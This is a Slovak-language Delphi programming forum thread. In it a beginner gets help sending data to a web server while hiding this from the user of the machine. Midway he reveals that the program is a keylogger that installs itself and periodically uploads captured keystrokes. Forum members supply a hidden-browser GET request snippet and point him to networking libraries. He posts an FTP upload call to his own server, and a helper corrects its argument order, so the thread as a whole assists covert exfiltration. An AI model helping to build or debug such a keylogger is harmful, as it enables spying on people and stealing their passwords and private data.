open url delphi

Programovacie jazyky, rady, poradňa...
feromakovi
Expert
Expert

open url delphi

Príspevok od používateľa feromakovi »

zdravím,
potrebujem v delphi otvoriť url ale tak aby to bolo skryté mám to takto:

Kód: Vybrať všetko

ShellExecute(HANDLE,'OPEN',PAnsiChar(label1.caption),nil,nil,SW_HIDE);

pričom v label1.caption je 'www.nieco.com/index.php?toto=hento&to=tamto' lebo som sa dočítal že tak ako to mám by to malo fungovať tak aby to nebolo vidno ale nie...normálne sa mi otvorý defaultný prehliadač a otvorí mi tú stránku...možno je to tým že tým posielam premennú cez get...
ja by som chcel vyriešiť aby som mohol tak posielať premenné cez get v URL a aby to bolo 'nevyditeľné' aby to užívateľ nevidel...a aby sa tam pekne aj poslali tie premenné: toto,to

máte nejaké nápady?? za každý budem vďačný

garantujem K+ všetkým okrem audiotracka pretože mu ďakujem príliš často :) tak už mu to nechce akosi odo mňa pridávať
audiotrack
VIP
VIP
Používateľov profilový obrázok
Kontaktovať používateľa:

Príspevok od používateľa audiotrack »

radšej sa zdržím otázok na kerého čerta takéto kraviny vymýšlaš, lebo viem že sa nikdy nepoučíš. Už minule sme ťa smerovali na posielanie requestov cez synapse, indy alebo niečo iné. Prípadne použiť vstavaný webbrowser. Toto je veľmi pomalé, a neverím že to okno na konci aj uzavreš takže iba zapratávaš pamäť, ale budiž:

procedure TForm1.Button1Click(Sender: TObject);
var
  ie: IWebBrowser2;
  Url, pom: OleVariant;
begin
  ie := CreateOleObject('InternetExplorer.Application') as IWebBrowser2;
  Url := 'http://www.nieco.com/index.php?toto=hento&to=tamto';
  ie.Navigate2(Url,pom,pom,pom,pom);
  ie.Visible := false;
end;
do uses bude treba pridať shDocvw a ComObj
feromakovi
Expert
Expert

otdpoveď

áno môžeš mi tu nadávať je to tvoj názor a tiež neviem prečo mám v ranku že light expert keď som veľmi slabý začiatočník...a snažím sa postupne učiť čo potrebujem...odkiaľ mám vedeť že to zaberá veľa pamete?? daj nejaký principiálny návod ako zistiť kedy aplikácia zaberá veľa pamete...naj pre začiatočníka, ďalej že slová ako request synapse mi nič nehovoria možno to indy(myslím nejaký trik pri snowboardingu) ja som ani nečakal že mi napíšeš celý algoritmus skôr som chcel nejaké konkrétnejšie rady ako techniku, princípy a proste rady skúsenejších, ktoré sa týkajú môjho problému, prípadne linky kde sa venujú tomu čo je synapse a ako ho použiť v delphi...keď som rozmýšľal nad spôsobom ako to naprogramovať napadlo ma len jedno riešenie, o ktorom si myslím že je možné ho uskutočniť...keby som vedel aj nejaké riešenie cez ten request asi by som si vybral to...lebo si ho dal na začiatok...
vieš mi aj teraz odpovedať??
Mmartin
Guru
Guru

Príspevok od používateľa Mmartin »

trochu OT...
Ranky sa prideluju podla poctu prispevkov
feromakovi
Expert
Expert

heh

:) ale tak to samozrejme viem to som len tak napísal aby ma audiotrack nebral ako profesionála v programovaní keď ním nie som a že sa mu moje jediné riešenie zdá byť blbé keď poznám len jedno a on ich pozná tisícky... :wink:
audiotrack
VIP
VIP
Kontaktovať používateľa:

nie je hranica medzi veľa a málo pamäte, je to relatívne. Je ale rozdiel či tie premenné na stránku pošleš "len tak" alebo kvôli tomu otvoríš IE. V task manageri si môžeš pozreť koľko pamäte ten spotrebuje. Teraz ak takýchto stránok bude potrebovať viac, zakaždým budeš otvárať nové a nové IE kde budeš načítavať tieto stránky. Užívateľ nevidí žiadne okná, tak ani nevie že mu žereš pamäť...
Tým sa pomaly dostávam k tým trom variantom čo som spomenul:
1) použiť webbrowser v delphi. Je to prakticky to isté, môže byť skrytý ale so zavretím programu sa uvolní z pamäte, čo tvoje IE skryté okna nie. Musel by si sa o to postarať sám
2) synapse ( http://www.synapse.ararat.cz/doku.php/start ) čo je knižnica na prácu s TCP/IP, a teda dokáže posielať aj post a get na ľubovolnú stránku. Výslednú stránku si dokážeš spracovať, pozreť jej hlavičku a prakticky čokoľvek. Netreba ju teda nikde zobrazovať ak to nepotrebuješ = nárasť rýchlosti a zníženie pamäťových nárokov
3) indy ( http://www.indyproject.org/index.en.aspx ) podobne ako synapse. Trochu o inom, ale tento problém zvláda tiež
chrono
VIP
VIP

Príspevok od používateľa chrono »

Ešte doplním, že použiť sa dá aj knižnica curl, ale keďže nepíšeš, na čo to má slúžiť, tak to môže, ale aj nemusí, byť vhodné riešenie.
feromakovi
Expert
Expert

no takže má to byť keylogger ktorý som zatial spravil tak že po spustení sa dá do PC a každý časový limit vyšle na internet text čo bolo stlačené...není dávno som tu riešil že aké dlhé môžu byť tie url ďalej aby sa zapisovali v tom php každý zvlášť po riadkoch a tak...ten textový súbor to bude vlastne užívateľské meno a logy...
a ak užívateľ nieje pripojený na net tak sa logy len zaznámenávajú a neodosielajú až pokým sa nepripojí..
no a ten synapse to je celkom dobre už som to pomaly začal študovať myslím že to sa na to úplne hodí...len zatiaľ márne hľadám konkrétne príkazy a funkcie, že ktorá na čo slúži....tak len si pozerám demos a snažím sa to pochopiť...
al ak by niekto vedel o nejakom popise príkazov, procedúr a funkcíí ohľadne synapse...budem mu vďačný

//autoeditácia príspevku ( 08 Aug 2009, 13:59 )
no takže našiel som čo som potreboval synapse je veľmi dobrá vec :)
len tak ma napadlo keď som našiel vo funkciách že odosielanie súboru na ftp....neviem či je to vhodné riešenie...to by bola prvá otázka...ak nie tak by som poprosil aj zdôvodniť...a skúšal som to spísať:

uses ftpsend

if ftpputfile('88.86.103.244','21','C:\aa.txt','aa2.txt','feromakovi.tym.sk','heslo') then showmessage('dobre')
else showmessage('sračka'); 
ale nefunguje mi to...vidíte niekde chybu??...to '21' to je port neviem či je to správne to som len opísal z netu z examplov a tá IP to som dal www.ic.cz čiže miesto kde mám ftp cez ping do CMD a vypísalo mi tú IP takžee myslím že by to malo byť dobre..viete poradiť??
audiotrack
VIP
VIP
Kontaktovať používateľa:

keď som pozeral v referenčnej príručke tú ftpputfile funkciu, tak vidím že tam máš vymenené súbory. Najprv je filename a potom je local file. Tiež si nemyslím že dávaš správnu ip, skôr to bude ip ftp.ic.cz alebo niečo podobné, neviem, nepoužívam :)
Napísať odpoveď